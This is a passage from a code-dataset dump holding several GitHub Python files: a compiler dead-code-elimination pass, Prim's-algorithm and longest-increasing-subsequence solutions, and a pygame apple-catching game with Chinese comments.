new_instrs.append(instr)\n else:\n new_instrs.append(instr)\n\n func[\"instrs\"] = new_instrs\n\n return program\n\n\ndef local_dce(program):\n \"\"\"\n Eliminate instructions that are written over without being read, inside a\n basic block.\n \"\"\"\n for func in program[\"functions\"]:\n basic_blocks = form_blocks(func[\"instrs\"])\n new_basic_blocks = []\n for bb in basic_blocks:\n new_bb = []\n to_delete = []\n last_use = dict()\n for idx, instr in enumerate(bb):\n if \"args\" in instr:\n args = instr[\"args\"]\n for a in args:\n if a in last_use:\n (def_idx, _) = last_use[a]\n last_use[a] = (def_idx, idx)\n if \"dest\" in instr:\n dst = instr[\"dest\"]\n if dst in last_use:\n (def_idx, use) = last_use[dst]\n if use == None:\n to_delete.append(def_idx)\n last_use[dst] = (idx, None)\n\n # This is in fact incorrect! A value in one bb not used can still be used later\n # as in the diamond patter. I leave it commented out as a lesson for myself.\n # for dst, (def_idx, last_use_idx) in last_use.items():\n # if last_use_idx == None:\n # to_delete.append(def_idx)\n\n for idx, instr in enumerate(bb):\n if idx not in to_delete:\n new_bb.append(instr)\n\n new_basic_blocks.append(new_bb)\n func[\"instrs\"] = join_blocks(new_basic_blocks)\n return program\n\n\ndef iterate_dce(program, dce_method):\n \"\"\"\n Iterates specified DCE method\n \"\"\"\n has_changed = True\n while has_changed:\n old_program = deepcopy(program)\n program = dce_method(program)\n has_changed = not (program == old_program)\n\n return program\n\n\ndef dce(program, global_delete, local_delete, adce, ms):\n \"\"\"\n Naive DCE wrapper method\n \"\"\"\n if bool(adce) == True:\n return global_adce(program)\n if bool(ms) == True:\n return mark_sweep_dce(program)\n if global_delete == None and local_delete == None:\n return iterate_dce(iterate_dce(program, local_dce), delete_unused_dce)\n elif global_delete == None and local_delete:\n return iterate_dce(program, local_dce)\n elif global_delete and local_delete == None:\n return iterate_dce(program, delete_unused_dce)\n return iterate_dce(iterate_dce(program, local_dce), delete_unused_dce)\n\n\n@click.command()\n@click.option('--global-delete', default=1, help='Delete Globally.')\n@click.option('--local-delete', default=1, help='Delete Locally.')\n@click.option('--adce', default=False, help='Delete Aggressively.')\n@click.option('--ms', default=False, help='Delete with Mark Sweep Algorithm.')\n@click.option('--pretty-print', default=False, help='Pretty Print Before and After Optimization.')\ndef main(global_delete, local_delete, adce, ms, pretty_print):\n prog = json.load(sys.stdin)\n if pretty_print:\n print(json.dumps(prog, indent=4, sort_keys=True))\n final_prog = dce(prog, global_delete, local_delete, adce, ms)\n if pretty_print:\n print(json.dumps(final_prog, indent=4, sort_keys=True))\n print(json.dumps(final_prog))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JonathanDLTran/CS6120-Jonathan","sub_path":"dce.py","file_name":"dce.py","file_ext":"py","file_size_in_byte":18064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72775035894","text":"\nimport sys\ninput = sys.stdin.readline\nimport heapq\n\nn = int(input())\narr = [int(input()) for _ in range(n)]\ngraph = [[] for _ in range(n+1)]\nmatrix = [[] for _ in range(n+1)]\n\nfor i in range(n):\n graph[0].append((arr[i],i+1))\n \nfor i in range(1,n+1):\n nodes = [0]+list(map(int, input().split()))\n matrix[i] = nodes\n \nfor i in range(1,n):\n for j in range(i+1, n+1):\n # start, cost, end\n graph[i].append((matrix[i][j],j))\n graph[j].append((matrix[i][j],i))\n \nvisited = [True]+[False]*(n)\nq = graph[0]\nheapq.heapify(q)\nresult = 0\ncnt = 0\n\nwhile q:\n if cnt==n:\n break\n z,x = heapq.heappop(q)\n if not visited[x]:\n visited[x]=True\n cnt+=1\n result+=z\n for j in graph[x]: # 연결된 end 노드 방문한 적 없는 경우\n if not visited[j[1]]:\n heapq.heappush(q,j)\n\nprint(result)\n","repo_name":"JangAyeon/Algorithm","sub_path":"백준/Gold/1368. 물대기/물대기-프림알고리즘.py","file_name":"물대기-프림알고리즘.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37216553981","text":"class Solution:\n def lengthOfLIS(self, nums: 'List[int]') -> int: # O( NlogN | N )\n def binFind(arr, v): # find the first one in arr >= v\n s = 0 \n e = len(arr) - 1 \n output = None\n while s <= e:\n mid = s - (s-e)//2\n if arr[mid] >= v:\n e = mid - 1\n output = mid\n else:\n s = mid + 1\n return output\n \n dp = []\n output = 0\n for n in nums: # to find the first one in the dp, >= current n\n if len(dp) == 0 or n > dp[-1]:\n dp.append(n)\n else:\n idx = binFind(dp, n)\n dp[idx] = n\n \n output = max(output, len(dp))\n \n return output\n \n\n\n\n\n# previous solution\n\n# class Solution:\n# def lengthOfLIS(self, nums: List[int]) -> int:\n# dp = [1] * len(nums)\n# for i in range(1, len(nums)):\n# for j in range(i-1, -1, -1):\n# if nums[j] < nums[i]:\n# dp[i] = max(dp[i], dp[j] + 1)\n# if nums[j] == nums[i]-1:\n# break\n \n# return max(dp)\n \n\n\n# previous solution\n\n# class Solution:\n# def lengthOfLIS(self, nums: 'List[int]') -> int:\n# if nums ==[]: return 0\n# else:\n# dp = [1]\n# for i in range(1, len(nums)):\n# m = 1\n# for j in range(i-1, -1, -1):\n# if nums[j] < nums[i]:\n# m = max(m, dp[j]+1)\n# dp.append(m)\n# return max(dp)\n\n\n\n# previous solution \n\n# class Solution:\n# def lengthOfLIS(self, nums: 'List[int]') -> int:\n# dp = [1] * len(nums)\n# ans = 1\n# for i in range(1, len(nums)):\n# for j in range(i-1, -1, -1):\n# if nums[j] < nums[i]:\n# dp[i] = max(dp[i], dp[j] + 1)\n# if nums[j] == nums[i]-1:\n# break\n# ans = max(ans, dp[i])\n# return ans\n\n\n# previous solution\n\n# class Solution:\n# def lengthOfLIS(self, nums: 'List[int]') -> int:\n# if len(nums) in [0,1]:\n# return len(nums)\n# long = [None] * len(nums)\n# long[0] = None\n\n# for i in range(len(nums)):\n# find = 1\n# tempMax = [-99]\n# for j in range(i, -1, -1):\n# if long[j] != None and nums[j]= SCREEN_HEIGHT - self.rect.height:\r\n self.rect.top = SCREEN_HEIGHT - self.rect.height\r\n else:\r\n self.rect.top = y\r\n if x < 0:\r\n self.rect.left = 0\r\n elif x > SCREEN_WIDTH - self.rect.width:\r\n self.rect.left = SCREEN_WIDTH - self.rect.width\r\n else:\r\n self.rect.left = x\r\n\r\n # 接炸弹\r\n def picking_bomb(self, bomb_group1):\r\n # 判断是否接到炸弹\r\n picked_bombs = pygame.sprite.spritecollide(self, bomb_group1, True)\r\n # 接到的炸弹消失\r\n if picked_bombs:\r\n bomb_sound.play()\r\n global OVER_FLAG\r\n OVER_FLAG = True\r\n self.kill()\r\n\r\n # 接苹果\r\n def picking_apple(self, app_group):\r\n\r\n # 判断接到几个苹果\r\n picked_apples = pygame.sprite.spritecollide(self, app_group, True)\r\n\r\n # 添加分数\r\n self.apple_num += len(picked_apples)\r\n\r\n # 接到的苹果消失\r\n for picked_apple in picked_apples:\r\n picked_apple.kill()\r\n\r\n apple_sound.set_volume(1.0)\r\n if picked_apples:\r\n apple_sound.set_volume(0.2)\r\n apple_sound.play()\r\n\r\n\r\n# 苹果类\r\nclass Apple(pygame.sprite.Sprite):\r\n def __init__(self, app_surface, apple_pos):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image = app_surface\r\n self.rect = self.image.get_rect()\r\n self.rect.topleft = apple_pos\r\n self.speed = 1\r\n\r\n def update(self):\r\n global START_TIME\r\n if START_TIME is None:\r\n START_TIME = time.time()\r\n self.rect.top += (self.speed * (1 + (time.time() - START_TIME) / 40))\r\n if self.rect.top > SCREEN_HEIGHT:\r\n # 苹果落地游戏结束\r\n global OVER_FLAG\r\n OVER_FLAG = True\r\n self.kill()\r\n\r\n\r\n# 炸弹类\r\nclass Bomb(pygame.sprite.Sprite):\r\n def __init__(self, bomb1_surface, bomb_pos):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image = bomb1_surface\r\n self.rect = self.image.get_rect()\r\n self.rect.topleft = bomb_pos\r\n self.speed = 1\r\n\r\n def update(self):\r\n global START_TIME\r\n if START_TIME is None:\r\n START_TIME = time.time()\r\n self.rect.top += (self.speed * (1 + (time.time() - START_TIME) / 40))\r\n if self.rect.top > SCREEN_HEIGHT:\r\n # 炸弹落地消失\r\n self.kill()\r\n\r\n\r\n# # 初始化游戏\r\n\r\npygame.init()\r\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\r\n# pygame.display.set_caption(\"接苹果\")\r\n\r\n# 载入图片\r\nbackground_surface = pygame.image.load(BACKGROUND_IMAGE_PATH).convert()\r\nbackground_surface2 = pygame.image.load(BACKGROUND_IMAGE_PATH2).convert()\r\nbackground_surface3 = pygame.image.load(BACKGROUND_IMAGE_PATH3).convert_alpha()\r\nmonkey_surface = pygame.image.load(MONKEY_IMAGE_PATH).convert_alpha()\r\napple_surface = pygame.image.load(APPLE_IMAGE_PATH).convert_alpha()\r\nbomb_surface1 = pygame.image.load(BOMB_IMAGE_PATH).convert_alpha()\r\n# 创建猴子\r\nmonkey = Monkey(monkey_surface, (200, 500))\r\n# 创建苹果组\r\napple_group = pygame.sprite.Group()\r\nbomb_group = pygame.sprite.Group()\r\n# 分数字体\r\nscore_font = pygame.font.SysFont(\"arial\", 40)\r\n\r\ngame_mode = None\r\nscore = None\r\n# 主菜单\r\ndef main_menu():\r\n global game_mode\r\n font = pygame.font.SysFont(\"Georgia\", 40, bold=1)\r\n start_text_surface = font.render(\"Press 'B' to Begin\", True, (255, 255, 255))\r\n mode_text_surface = font.render(\"Press 'M' to Choose Mode\", True, (255, 255, 255))\r\n while True:\r\n screen.blit(background_surface, (0, 0))\r\n screen.blit(start_text_surface, (200, 270))\r\n screen.blit(mode_text_surface, (160, 320))\r\n pygame.display.update()\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n exit()\r\n if event.type == KEYDOWN:\r\n if event.key == K_b:\r\n return\r\n elif event.key == K_m:\r\n return choose_game_mode()\r\n\r\n\r\ndef choose_game_mode():\r\n font = pygame.font.SysFont(\"Georgia\", 50)\r\n easy_text_surface = font.render(\"Press 'E' for Easy Mode\", True, (255, 255, 255))\r\n hard_text_surface = font.render(\"Press 'H' for Hard Mode\", True, (255, 255, 255))\r\n while True:\r\n screen.blit(background_surface, (0, 0))\r\n screen.blit(easy_text_surface, (120, 270))\r\n screen.blit(hard_text_surface, (120, 320))\r\n pygame.display.update()\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n exit()\r\n if event.type == KEYDOWN:\r\n if event.key == K_e:\r\n return hard_mode()\r\n elif event.key == K_h:\r\n return easy()\r\n# 打印文本\r\ndef print_text1(font2, x, y, text, color=(255, 255, 255)):\r\n img_text = font2.render(text, True, color)\r\n screen2 = pygame.display.get_surface()\r\n screen2.blit(img_text, (x, y))\r\n\r\n# 精灵类\r\nclass MySprite(pygame.sprite.Sprite):\r\n def __init__(self):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image = None # 添加image属性\r\n self.rect = None\r\n self.master_image = None\r\n self.frame = 0\r\n self.old_frame = -1\r\n self.frame_width = 1\r\n self.frame_height = 1\r\n self.first_frame = 0\r\n self.last_frame = 0\r\n self.columns = 1\r\n self.last_time = 0\r\n self.direction = 0\r\n self.velocity = Point(0.0, 0.0)\r\n\r\n def _getx(self):\r\n return self.rect.x\r\n\r\n def _setx(self, value):\r\n self.rect.x = value\r\n\r\n X = property(_getx, _setx)\r\n\r\n def _gety(self):\r\n return self.rect.y\r\n\r\n def _sety(self, value):\r\n self.rect.y = value\r\n\r\n Y = property(_gety, _sety)\r\n\r\n def _getpos(self):\r\n return self.rect.topleft\r\n\r\n def _setpos(self, pos):\r\n self.rect.topleft = pos\r\n\r\n position = property(_getpos, _setpos)\r\n\r\n def load(self, filename, width, height, columns):\r\n self.master_image = pygame.image.load(filename).convert_alpha()\r\n self.frame_width = width\r\n self.frame_height = height\r\n self.rect = Rect(0, 0, width, height)\r\n self.columns = columns\r\n rect = self.master_image.get_rect()\r\n self.last_frame = (rect.width // width) * (rect.height // height) - 1\r\n self.image = self.master_image.subsurface(Rect(0, 0, min(width, self.master_image.get_width()),\r\n min(height, self.master_image.get_height()))).copy()\r\n\r\n # 设置image属性\r\n\r\n def update(self, current_time, rate=30):\r\n if current_time > self.last_time + rate:\r\n self.frame += 1\r\n if self.frame > self.last_frame:\r\n self.frame = self.first_frame\r\n self.last_time = current_time\r\n\r\n if self.frame != self.old_frame:\r\n frame_x = (self.frame % self.columns) * self.frame_width\r\n frame_y = (self.frame // self.columns) * self.frame_height\r\n\r\n frame_rect = Rect(frame_x, frame_y, self.frame_width, self.frame_height)\r\n image_rect = self.master_image.get_rect()\r\n\r\n if frame_rect.right > image_rect.width or frame_rect.bottom > image_rect.height:\r\n frame_rect = image_rect\r\n\r\n self.image = self.master_image.subsurface(frame_rect).copy()\r\n self.old_frame = self.frame\r\n\r\n# 点类\r\nclass Point(object):\r\n def __init__(self, x, y):\r\n self.__x = x\r\n self.__y = y\r\n\r\n def getx(self):\r\n return self.__x\r\n\r\n def setx(self, x):\r\n self.__x = x\r\n\r\n x = property(getx, setx)\r\n\r\n def gety(self):\r\n return self.__y\r\n\r\n def sety(self, y):\r\n self.__y = y\r\n\r\n y = property(gety, sety)\r\n\r\n def __str__(self):\r\n return \"{X:\" + \"{:.0f}\".format(self.__x) + \",Y:\" + \"{:.0f}\".format(self.__y) + \"}\"\r\n\r\n\r\n# noinspection PyTypeChecker\r\ndef hard_mode():\r\n # 初始化pygame\r\n pygame.init()\r\n screen3 = pygame.display.set_mode((800, 600))\r\n pygame.display.set_caption(\"接苹果\")\r\n font = pygame.font.Font(None, 50)\r\n timer = pygame.time.Clock()\r\n\r\n # 创建精灵组\r\n player_group = pygame.sprite.Group()\r\n apple1_group = pygame.sprite.Group()\r\n\r\n # 初始化玩家精灵组\r\n player = MySprite()\r\n player.load(\"./images/player_animation.png\", 96, 96, 8)\r\n player.position = 80, 500\r\n player.direction = 0\r\n player_group.add(player)\r\n\r\n # 初始化苹果精灵组\r\n for i in range(10):\r\n apple = MySprite()\r\n apple.load(\"./images/apple.png\", 64, 64, 1)\r\n apple.position = random.randint(100, 700), random.randint(-200, -100)\r\n apple.velocity = Point(0, random.randint(2, 6))\r\n apple1_group.add(apple)\r\n\r\n game_over = False # 控制游戏进程变量,初始化为false\r\n player_moving = False # 控制小人移动变量,初始化为false\r\n score2 = 0 # 分数初始化为0\r\n high_score = 0 # 最高分\r\n\r\n # 定义游戏时间(秒)\r\n game_time = 60\r\n start_time = time.time() # 保存当前时间\r\n\r\n # 初始化最高分\r\n try:\r\n with open(\"high_score3.txt\", \"r\") as file:\r\n high_score = int(file.read())\r\n except FileNotFoundError:\r\n with open(\"high_score3.txt\", \"w\") as file:\r\n file.write(str(high_score))\r\n\r\n def show_game_over_screen():\r\n image1 = pygame.image.load(\"./images/bg4.png\")\r\n font1 = pygame.font.Font(None, 50)\r\n font2 = pygame.font.Font(None, 70)\r\n screen3.blit(image1, (0, 0))\r\n print_text1(font1, 295, 120, \"Game Over\", (0, 0, 0)) # 121行定义font属性4 游戏结束显示Game Over\r\n print_text1(font2, 300, 220, \"Score: \" + str(score2), (0, 0, 0)) # 游戏结束显示Score+分数\r\n print_text1(font1, 290, 355, \"HighScore: \" + str(high_score), (190, 0, 0))\r\n print_text1(font1, 320, 480, \"ESC exits\", (0, 0, 0))\r\n keys1 = pygame.key.get_pressed()\r\n if keys1[K_ESCAPE]:\r\n restart_game()\r\n pygame.display.update()\r\n\r\n # 加载图片\r\n image = pygame.image.load(\"./images/img.png\")\r\n\r\n def show_game_over_screen1():\r\n screen3.blit(image, (0, 0))\r\n print_text1(font, 100, 200, \"Congratulations on breaking the record\", (139, 0, 0))\r\n print_text1(font, 100, 250, \"Your score is: \" + str(score2), (139, 0, 0))\r\n pygame.display.flip()\r\n\r\n while True:\r\n timer.tick(30)\r\n Ticks = pygame.time.get_ticks()\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n exit()\r\n\r\n keys = pygame.key.get_pressed()\r\n if keys[K_ESCAPE]:\r\n restart_game()\r\n elif keys[K_UP] or keys[K_w]:\r\n player.direction = 0\r\n player_moving = True\r\n elif keys[K_RIGHT] or keys[K_d]:\r\n player.direction = 2\r\n player_moving = True\r\n elif keys[K_DOWN] or keys[K_s]:\r\n player.direction = 4\r\n player_moving = True\r\n elif keys[K_LEFT] or keys[K_a]:\r\n player.direction = 6\r\n player_moving = True\r\n else:\r\n player_moving = False\r\n\r\n if not game_over:\r\n player.first_frame = player.direction * player.columns\r\n player.last_frame = player.first_frame + player.columns - 1\r\n if player.frame < player.first_frame:\r\n player.frame = player.first_frame\r\n\r\n if not player_moving:\r\n player.frame = player.first_frame = player.last_frame\r\n else:\r\n player.velocity = Point(0.0, 0.0)\r\n if player.direction == 0:\r\n player.velocity.y = -6\r\n elif player.direction == 2:\r\n player.velocity.x = 6\r\n elif player.direction == 4:\r\n player.velocity.y = 6\r\n elif player.direction == 6:\r\n player.velocity.x = -6\r\n\r\n if player_moving:\r\n player.X += player.velocity.x\r\n player.Y += player.velocity.y\r\n if player.X < 0:\r\n player.X = 0\r\n elif player.X > 700:\r\n player.X = 700\r\n if player.Y < 0:\r\n player.Y = 0\r\n elif player.Y > 500:\r\n player.Y = 500\r\n\r\n player_group.update(Ticks, 60)\r\n\r\n for apple in apple1_group:\r\n apple.Y += apple.velocity.y\r\n if apple.Y > 600:\r\n apple.X = random.randint(100, 700)\r\n apple.Y = random.randint(-200, -100)\r\n\r\n if pygame.sprite.collide_rect_ratio(0.5)(player, apple):\r\n apple_sound.play()\r\n apple.X = random.randint(100, 700)\r\n apple.Y = random.randint(-200, -100)\r\n score2 += 1\r\n\r\n apple1_group.update(Ticks, 70)\r\n\r\n if time.time() - start_time > game_time:\r\n game_over = True\r\n\r\n screen3.blit(background_surface2, (0, 0))\r\n apple1_group.draw(screen3)\r\n player_group.draw(screen3)\r\n print_text1(font, 0, 0, \"Score: \" + str(score2), (54, 54, 54))\r\n print_text1(font, 650, 0, \"Time: \" + str(int(game_time - (time.time() - start_time))), (54, 54, 54))\r\n else:\r\n if high_score < score2:\r\n high_score = score2\r\n with open(\"high_score3.txt\", \"w\") as file:\r\n file.write(str(high_score))\r\n show_game_over_screen1()\r\n else:\r\n show_game_over_screen() # 游戏结束,绘制游戏页面\r\n time.sleep(3)\r\n restart_game()\r\n\r\n pygame.display.update()\r\n\r\n\r\n# 重新开始游戏函数\r\ndef restart_game():\r\n global MOVE_STATUS, OVER_FLAG, START_TIME, offset, ticks, score\r\n MOVE_STATUS = False\r\n OVER_FLAG = False\r\n START_TIME = None\r\n offset = {pygame.K_LEFT: 0, pygame.K_RIGHT: 0, pygame.K_UP: 0, pygame.K_DOWN: 0,\r\n pygame.K_w: 0, pygame.K_a: 0, pygame.K_s: 0, pygame.K_d: 0} # 重置初始位置\r\n apple_group.empty() # 清空苹果组\r\n bomb_group.empty() # 清空炸弹组\r\n pygame.mixer.music.stop() # 停止音乐\r\n pygame.mixer.music.play(-1) # 重新播放音乐\r\n main()\r\n ticks = 0\r\n score = 0\r\n monkey.apple_num = 0\r\n score_surface = score_font.render(str(monkey.apple_num), True, (255, 255, 255))\r\n screen.blit(score_surface, (620, 10))\r\n # 更新屏幕\r\n pygame.display.update()\r\n\r\n\r\n# 从文件中读取最高分数\r\ndef load_high_score():\r\n try:\r\n with open('high_score.txt', 'r') as f:\r\n high_score = int(f.read())\r\n except FileNotFoundError:\r\n # 处理文件不存在的情况\r\n high_score = 0\r\n except ValueError:\r\n # 处理文件内容无法转换为整数的情况\r\n high_score = 0\r\n else:\r\n # 如果没有发生异常,则关闭文件\r\n f.close()\r\n return high_score\r\n\r\n# 将最高分数保存到文件中\r\ndef save_high_score(high_score):\r\n with open('high_score.txt', 'w') as f:\r\n f.write(str(high_score))\r\n\r\n\r\n# noinspection DuplicatedCode,PyTypeChecker\r\ndef easy():\r\n pygame.init()\r\n screen1 = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\r\n pygame.mixer.music.load(\"./images/music1.mp3\")\r\n\r\n # 播放音乐\r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1)\r\n # 初始化字体\r\n score1_font = pygame.font.SysFont(\"arial\", 70)\r\n over_font = pygame.font.SysFont(\"arial\", 40)\r\n high_score_font = pygame.font.SysFont(\"arial\", 40)\r\n monkey1 = Monkey(monkey_surface, (200, 500))\r\n monkey1.apple_num = 0\r\n ticks_2 = 0\r\n high_score = load_high_score()\r\n # 主循环\r\n while True:\r\n if OVER_FLAG:\r\n break\r\n\r\n # 控制游戏最大帧率\r\n clock.tick(FRAME_RATE)\r\n\r\n # 绘制背景\r\n screen.blit(background_surface, (0, 0))\r\n if ticks_2 >= ANIMATE_CYCLE:\r\n ticks_2 = 0\r\n\r\n if ticks_2 % 40 == 0 and len(apple_group) <= 15:\r\n apple = Apple(apple_surface,\r\n [randint(0, SCREEN_WIDTH - apple_surface.get_width()), -apple_surface.get_height()])\r\n while pygame.sprite.spritecollide(apple, bomb_group, False):\r\n apple.rect.top = -apple_surface.get_height()\r\n apple.rect.left = randint(0, SCREEN_WIDTH - apple_surface.get_width())\r\n apple_group.add(apple)\r\n\r\n if len(apple_group) >= 15 and ticks_2 % 30 == 0 and len(bomb_group) < 3:\r\n bomb = Bomb(bomb_surface1,\r\n [randint(0, SCREEN_WIDTH - bomb_surface1.get_width()), -bomb_surface1.get_height()])\r\n while pygame.sprite.spritecollide(bomb, apple_group, False):\r\n bomb.rect.top = -bomb_surface1.get_height()\r\n bomb.rect.left = randint(0, SCREEN_WIDTH - bomb_surface1.get_width())\r\n bomb_group.add(bomb)\r\n\r\n # 控制苹果\r\n apple_group.update()\r\n bomb_group.update()\r\n # 绘制苹果组\r\n apple_group.draw(screen)\r\n # 绘制炸弹组\r\n bomb_group.draw(screen)\r\n\r\n # 绘制猴子\r\n screen.blit(monkey_surface, monkey1.rect)\r\n ticks_2 += 1\r\n\r\n # 接苹果\r\n monkey1.picking_apple(apple_group)\r\n monkey1.picking_bomb(bomb_group)\r\n # 更新分数\r\n score_surface = score_font.render(str(monkey1.apple_num), True, (255, 255, 255))\r\n screen.blit(score_surface, (640, 10))\r\n if high_score > monkey1.apple_num:\r\n high_score_surface = high_score_font.render(\"Highest: \" + str(high_score), True, (255, 255, 255))\r\n else:\r\n high_score = monkey1.apple_num\r\n high_score_surface = high_score_font.render(\"Highest: \" + str(high_score), True, (255, 255, 255))\r\n save_high_score(high_score)\r\n # 绘制最高分数\r\n screen.blit(high_score_surface, (10, 10))\r\n\r\n # 更新屏幕\r\n pygame.display.update()\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n exit()\r\n\r\n # 控制方向\r\n if event.type == pygame.KEYDOWN:\r\n if event.key in offset:\r\n if event.key == pygame.K_UP:\r\n offset[event.key] = 80\r\n else:\r\n offset[event.key] = monkey1.speed\r\n elif event.type == pygame.KEYUP:\r\n if event.key in offset:\r\n offset[event.key] = 0\r\n monkey1.move(offset)\r\n\r\n # 游戏主循环\r\n while True:\r\n # 按钮字体\r\n button_font = pygame.font.SysFont(\"Georgia\", 40)\r\n # 重新开始按钮\r\n restart_surface = button_font.render(\"Restart\", True, (255, 255, 255))\r\n restart_rect = restart_surface.get_rect(center=(SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2 + 200))\r\n\r\n # 事件处理\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n exit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n # 检查用户是否点击重新启动按钮\r\n if restart_rect.collidepoint(event.pos):\r\n # 重启游戏\r\n restart_game()\r\n apple_group.empty()\r\n bomb_group.empty()\r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.stop()\r\n pygame.mixer.music.play(-1)\r\n # 退出游戏\r\n break\r\n\r\n high_score1_surface = high_score_font.render(\"Highest: \" + str(high_score), True, (190, 0, 0))\r\n score1_surface = score1_font.render(\"Score: \" + str(monkey1.apple_num), True, (0, 0, 0))\r\n over1_surface = over_font.render(\"Game Over!\", True, (0, 0, 0))\r\n # 游戏结束退出界面\r\n screen1.blit(background_surface3, (0, 0))\r\n screen1.blit(score1_surface, (285, 200))\r\n screen1.blit(over1_surface, (305, 105))\r\n screen1.blit(high_score1_surface, (300, 350))\r\n screen1.blit(restart_surface, restart_rect)\r\n pygame.display.flip()\r\n\r\n\r\n# 游戏主函数\r\n# noinspection DuplicatedCode,PyTypeChecker\r\ndef main():\r\n pygame.init()\r\n screen1 = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\r\n pygame.mixer.music.load(\"./images/music1.mp3\")\r\n\r\n # 播放音乐\r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.play(-1)\r\n # 初始化字体\r\n score1_font = pygame.font.SysFont(\"arial\", 70)\r\n over_font = pygame.font.SysFont(\"arial\", 40)\r\n high_score_font = pygame.font.SysFont(\"arial\", 40)\r\n monkey1 = Monkey(monkey_surface, (200, 500))\r\n monkey1.apple_num = 0\r\n main_menu()\r\n ticks_1 = 0\r\n high_score = load_high_score()\r\n # 主循环\r\n while True:\r\n if OVER_FLAG:\r\n break\r\n\r\n # 控制游戏最大帧率\r\n clock.tick(FRAME_RATE)\r\n\r\n # 绘制背景\r\n screen.blit(background_surface, (0, 0))\r\n if ticks_1 >= ANIMATE_CYCLE:\r\n ticks_1 = 0\r\n\r\n if ticks_1 % 40 == 0 and len(apple_group) <= 15:\r\n apple = Apple(apple_surface,\r\n [randint(0, SCREEN_WIDTH - apple_surface.get_width()), -apple_surface.get_height()])\r\n while pygame.sprite.spritecollide(apple, bomb_group, False):\r\n apple.rect.top = -apple_surface.get_height()\r\n apple.rect.left = randint(0, SCREEN_WIDTH - apple_surface.get_width())\r\n apple_group.add(apple)\r\n\r\n if len(apple_group) >= 15 and ticks_1 % 30 == 0 and len(bomb_group) < 3:\r\n bomb = Bomb(bomb_surface1,\r\n [randint(0, SCREEN_WIDTH - bomb_surface1.get_width()), -bomb_surface1.get_height()])\r\n while pygame.sprite.spritecollide(bomb, apple_group, False):\r\n bomb.rect.top = -bomb_surface1.get_height()\r\n bomb.rect.left = randint(0, SCREEN_WIDTH - bomb_surface1.get_width())\r\n bomb_group.add(bomb)\r\n\r\n # 控制苹果\r\n apple_group.update()\r\n bomb_group.update()\r\n # 绘制苹果组\r\n apple_group.draw(screen)\r\n # 绘制炸弹组\r\n bomb_group.draw(screen)\r\n\r\n # 绘制猴子\r\n screen.blit(monkey_surface, monkey1.rect)\r\n ticks_1 += 1\r\n\r\n # 接苹果\r\n monkey1.picking_apple(apple_group)\r\n monkey1.picking_bomb(bomb_group)\r\n # 更新分数\r\n score_surface = score_font.render(str(monkey1.apple_num), True, (255, 255, 255))\r\n screen.blit(score_surface, (640, 10))\r\n if high_score > monkey1.apple_num:\r\n high_score_surface = high_score_font.render(\"Highest: \" + str(high_score), True, (255, 255, 255))\r\n else:\r\n high_score = monkey1.apple_num\r\n high_score_surface = high_score_font.render(\"Highest: \" + str(high_score), True, (255, 255, 255))\r\n save_high_score(high_score)\r\n # 绘制最高分数\r\n screen.blit(high_score_surface, (10, 10))\r\n\r\n # 更新屏幕\r\n pygame.display.update()\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n exit()\r\n\r\n # 控制方向\r\n if event.type == pygame.KEYDOWN:\r\n if event.key in offset:\r\n if event.key == pygame.K_UP:\r\n offset[event.key] = 80\r\n else:\r\n offset[event.key] = monkey1.speed\r\n elif event.type == pygame.KEYUP:\r\n if event.key in offset:\r\n offset[event.key] = 0\r\n monkey1.move(offset)\r\n\r\n # 游戏主循环\r\n while True:\r\n # 按钮字体\r\n button_font = pygame.font.SysFont(\"Georgia\", 40)\r\n # 重新开始按钮\r\n restart_surface = button_font.render(\"Restart\", True, (255, 255, 255))\r\n restart_rect = restart_surface.get_rect(center=(SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2 + 200))\r\n\r\n # 事件处理\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n exit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n # 检查用户是否点击重新启动按钮\r\n if restart_rect.collidepoint(event.pos):\r\n # 重启游戏\r\n restart_game()\r\n apple_group.empty()\r\n bomb_group.empty()\r\n pygame.mixer.music.set_volume(0.5)\r\n pygame.mixer.music.lostop()\r\n pygame.mixer.music.play(-1)\r\n # 退出游戏\r\n break\r\n\r\n high_score1_surface = high_score_font.render(\"Highest: \" + str(high_score), True, (190, 0, 0))\r\n score1_surface = score1_font.render(\"Score: \" + str(monkey1.apple_num), True, (0, 0, 0))\r\n over1_surface = over_font.render(\"Game Over!\", True, (0, 0, 0))\r\n # 游戏结束退出界面\r\n screen1.blit(background_surface3, (0, 0))\r\n screen1.blit(score1_surface, (285, 200))\r\n screen1.blit(over1_surface, (305, 105))\r\n screen1.blit(high_score1_surface, (300, 350))\r\n screen1.blit(restart_surface, restart_rect)\r\n pygame.display.flip()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"MJEDssg/-","sub_path":"接苹果_5.py","file_name":"接苹果_5.py","file_ext":"py","file_size_in_byte":28535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42028565867","text":"import random\r\nimport cv2\r\nimport numpy as np\r\nimport 